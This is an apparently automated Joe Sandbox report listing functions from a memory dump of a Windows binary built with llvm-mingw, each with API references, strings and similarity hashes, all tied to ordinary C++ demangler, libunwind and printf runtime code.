Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction ID: 9e1d2deeace127755b703910320b7b63b3bf25d4591e7a3c47318b5509ff7589
Opcode Fuzzy Hash: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction Fuzzy Hash: 90B132B6A05B8683EF29DF56E55426DB762EB54BC0F148831CB9E877A1EF2CE4518300

Function 00007FF6099CFED0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CFF80
malloc.MSVCRT ref: 00007FF6099CFF9A
memcpy.MSVCRT ref: 00007FF6099CFFB9
free.MSVCRT ref: 00007FF6099D0040
_assert.MSVCRT ref: 00007FF6099D006B
free.MSVCRT ref: 00007FF6099D0085
realloc.MSVCRT ref: 00007FF6099D00F7
memcpy.MSVCRT ref: 00007FF6099D0111

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099D005E
Index < size() && "Invalid access!", xrefs: 00007FF6099D0057

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: freememcpyrealloc$_assertmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index < size() && "Invalid access!"
API String ID: 3641880838-4289452498
Opcode ID: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction ID: 410e02cb2544ab3b6482124c92b75361ec7177847b9121e4ee2adc523d253454
Opcode Fuzzy Hash: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction Fuzzy Hash: D451DB63A1AB4592EA60DF15F98027D6762FB98BD4F284131EE8D47B56DF3CD481C300

Function 00007FF6099C14B4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C15B8
memcpy.MSVCRT ref: 00007FF6099C15D7
realloc.MSVCRT ref: 00007FF6099C19E9
_assert.MSVCRT ref: 00007FF6099C1E69

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
_, xrefs: 00007FF6099C198D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmallocmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$_$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 2036919697-1558868925
Opcode ID: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction ID: 3bd5e45b06457858cc8b7e8e7ea949f51512edb02b2fd12ed336a57028881653
Opcode Fuzzy Hash: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction Fuzzy Hash: 5D6194B260AB4682EE71DF15E84027A67A6EB54780F680835DB8E87793DF3CF544C344

Function 00007FF6099C6D70 Relevance: 16.8, APIs: 11, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C6DA1
realloc.MSVCRT ref: 00007FF6099C6E7B
realloc.MSVCRT ref: 00007FF6099C6ED5
memcpy.MSVCRT ref: 00007FF6099C6EF3
realloc.MSVCRT ref: 00007FF6099C6F2E
realloc.MSVCRT ref: 00007FF6099C6F8D
realloc.MSVCRT ref: 00007FF6099C6FE9
realloc.MSVCRT ref: 00007FF6099C703E
memcpy.MSVCRT ref: 00007FF6099C705B
realloc.MSVCRT ref: 00007FF6099C70A2
memcpy.MSVCRT ref: 00007FF6099C70BC

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy$malloc
String ID:
API String ID: 774493741-0
Opcode ID: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction ID: d277f17837d46f90310ed2c7e5674bfff4ec73dc69375cd2cd23e62bf9a4f5ab
Opcode Fuzzy Hash: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction Fuzzy Hash: 5CA183B2A05B8683EE25CF56E8442ADA3A6EB647C0F188531CF9D47792EF3CE5518300

Function 00007FF6099C9150 Relevance: 16.7, APIs: 11, Instructions: 246COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C9198
realloc.MSVCRT ref: 00007FF6099C9220
realloc.MSVCRT ref: 00007FF6099C9279
memcpy.MSVCRT ref: 00007FF6099C9297
realloc.MSVCRT ref: 00007FF6099C92CF
realloc.MSVCRT ref: 00007FF6099C931B
realloc.MSVCRT ref: 00007FF6099C9380
realloc.MSVCRT ref: 00007FF6099C93D9
memcpy.MSVCRT ref: 00007FF6099C93F7
realloc.MSVCRT ref: 00007FF6099C942F
realloc.MSVCRT ref: 00007FF6099C94A2

Part of subcall function 00007FF6099C4F60: realloc.MSVCRT ref: 00007FF6099C4FED
Part of subcall function 00007FF6099C4F60: realloc.MSVCRT ref: 00007FF6099C506D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction ID: 91dd998e758b4f1b4015fbf2adeb7d1b45adef8d5c78eafa64fd65dd1ede1a3a
Opcode Fuzzy Hash: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction Fuzzy Hash: 55A163F2A06B4293DA29CF56F854369B3A2EB587C0F588531DB9E47796EF3CE4518300

Function 00007FF6099B7780 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

., xrefs: 00007FF6099B78F4

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction ID: 884ebe83dadb482ef237d7ace53ef703bead77775638b6726aa1d31f9c7f05e3
Opcode Fuzzy Hash: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction Fuzzy Hash: F7026372A1925287E7748E56E29073A77B2EB94740F285239DB9EC6F82DF2DF540C700

Function 00007FF6099D21E0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00007FF6099D2439

Strings

., xrefs: 00007FF6099D2354

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputc
String ID: .
API String ID: 1992160199-248832578
Opcode ID: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction ID: 70204cde06233f368e6a995e258bc1c71546f05591475046761e6780990863a5
Opcode Fuzzy Hash: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction Fuzzy Hash: 05F15072A0A24287F7798F16E1D073E77A2EB15750F684135DBAA86B86DF2CF841C700

Function 00007FF6099BCEA0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099BCFA9

Strings

string literal, xrefs: 00007FF6099BD033
struct, xrefs: 00007FF6099BCEA2

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: string literal$struct
API String ID: 471065373-3644149429
Opcode ID: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction ID: 9287e2e63d3f38b54b8f1559414dffc84c72f0f8a1a63f496db01073c99df67a
Opcode Fuzzy Hash: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction Fuzzy Hash: 8DD1C0B2A0AB8645EE658F15AA403B966E7AF18784F6C4531CB9D877C3EF3CE451C300

Function 00007FF6099C1129 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C11E6
memcpy.MSVCRT ref: 00007FF6099C1207

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocmemcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 4276657696-3503049562
Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction ID: dd1643f7bee13884386d6bdee1602359490d73c137cf56acdebb7a7add32f58a
Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction Fuzzy Hash: 85717F72609B4682EE719F15F8402AA63A6FB55780F684435DB8E87B97DF3CE444C344

Function 00007FF6099B62B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099B6377
fputwc.MSVCRT ref: 00007FF6099B63E3
fwprintf.MSVCRT ref: 00007FF6099B64AD
fwprintf.MSVCRT ref: 00007FF6099B64C7

Strings

%.*S, xrefs: 00007FF6099B64A0
%*.*S, xrefs: 00007FF6099B6303
%-*.*S, xrefs: 00007FF6099B64BD

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fwprintf$fputwcstrlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 3854221471-2115465065
Opcode ID: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction ID: 592bd44fc596ec09c790478523a9f5e9798083067e69b1d23b812a27f1ea4226
Opcode Fuzzy Hash: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction Fuzzy Hash: 1D515372A196568BE7748F16E55063A73B2EB48B60F284139DB5EC7792DF3CF8418B00

Function 00007FF6099B4810 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6099B484A
abort.MSVCRT ref: 00007FF6099B484F
fflush.MSVCRT ref: 00007FF6099B489A
abort.MSVCRT ref: 00007FF6099B489F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6099B4904

Strings

setFloatReg, xrefs: 00007FF6099B487A
libunwind: %s - %s, xrefs: 00007FF6099B4823, 00007FF6099B4873
float registers unimplemented, xrefs: 00007FF6099B4831, 00007FF6099B4881
getFloatReg, xrefs: 00007FF6099B482A

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: abortfflush$UnwindVirtual
String ID: float registers unimplemented$getFloatReg$libunwind: %s - %s$setFloatReg
API String ID: 3704712045-981669299
Opcode ID: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction ID: a2d3bd1147adeed5a3f114d22b7d9e0950224c5797228278898a5d30736ba7a2
Opcode Fuzzy Hash: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction Fuzzy Hash: C6317561A0AB5682EB14FF65F8953B96366FB44784F284036DA8E93753DE3CD546C300

Function 00007FF6099B60C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF6099B6195
fwprintf.MSVCRT ref: 00007FF6099B6277

Strings

%s , xrefs: 00007FF6099B60C1, 00007FF6099B60C2
%.*s, xrefs: 00007FF6099B6250
%-*.*s, xrefs: 00007FF6099B626D
%*.*s, xrefs: 00007FF6099B610D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputwcfwprintf
String ID: %*.*s$%-*.*s$%.*s$%s
API String ID: 3232229890-407542676
Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction ID: 373ce3b6ce4742ca176661ab4567f3bcb80f8080cc0fd022ca840eca5553e7fa
Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction Fuzzy Hash: 9D51E372A155068BF7788E1AE65063E73B2EF54760B288139DB5EC7793DE2CF8418B00

Function 00007FF6099C80F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6099C8153
realloc.MSVCRT ref: 00007FF6099C81A9
realloc.MSVCRT ref: 00007FF6099C820D
memcpy.MSVCRT ref: 00007FF6099C8227
realloc.MSVCRT ref: 00007FF6099C825F

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C8146
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6099C813F
'unnamed, xrefs: 00007FF6099C81BE

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$_assertmemcpy
String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
API String ID: 2140428464-3850676658
Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction ID: 352b84e34f17f4d7c6657e95bfc48ff271ac172f7dddad592e4b562a8a2549d7
Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction Fuzzy Hash: C84166F6A06B4282DE18CF46E95427963A2EB58BC4F688531CB9D47792EF3CD4918300

Function 00007FF6099BD9A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099BDA1E
malloc.MSVCRT ref: 00007FF6099BDA57
memcpy.MSVCRT ref: 00007FF6099BDA9B
_assert.MSVCRT ref: 00007FF6099BDAF8
_assert.MSVCRT ref: 00007FF6099BDB12

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099BDAEB, 00007FF6099BDB05
FromPosition <= Names.size(), xrefs: 00007FF6099BDAE4
Index <= size() && "dropBack() can't expand!", xrefs: 00007FF6099BDAFE

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmalloc$memcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$FromPosition <= Names.size()$Index <= size() && "dropBack() can't expand!"
API String ID: 4247363904-2992651634
Opcode ID: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction ID: e696e0a55b1221cdba69bfa0bd667a8fa36313c64961bafedcf5e2fd03df7002
Opcode Fuzzy Hash: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction Fuzzy Hash: 7B41E2B2719A0681EA249F05F9447A97766FB447C4F6D8035EE4C8B792EE7CE584C300

Function 00007FF6099B3F50 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6099B3F8F

Part of subcall function 00007FF6099B4120: fflush.MSVCRT ref: 00007FF6099B422D
Part of subcall function 00007FF6099B4120: fflush.MSVCRT ref: 00007FF6099B4287

RtlUnwindEx.KERNEL32 ref: 00007FF6099B40A6
fflush.MSVCRT ref: 00007FF6099B4106
abort.MSVCRT ref: 00007FF6099B410B

Strings

libunwind: _Unwind_Resume(ex_obj=%p), xrefs: 00007FF6099B3F73
_Unwind_Resume() can't return, xrefs: 00007FF6099B40ED
libunwind: %s - %s, xrefs: 00007FF6099B40DF
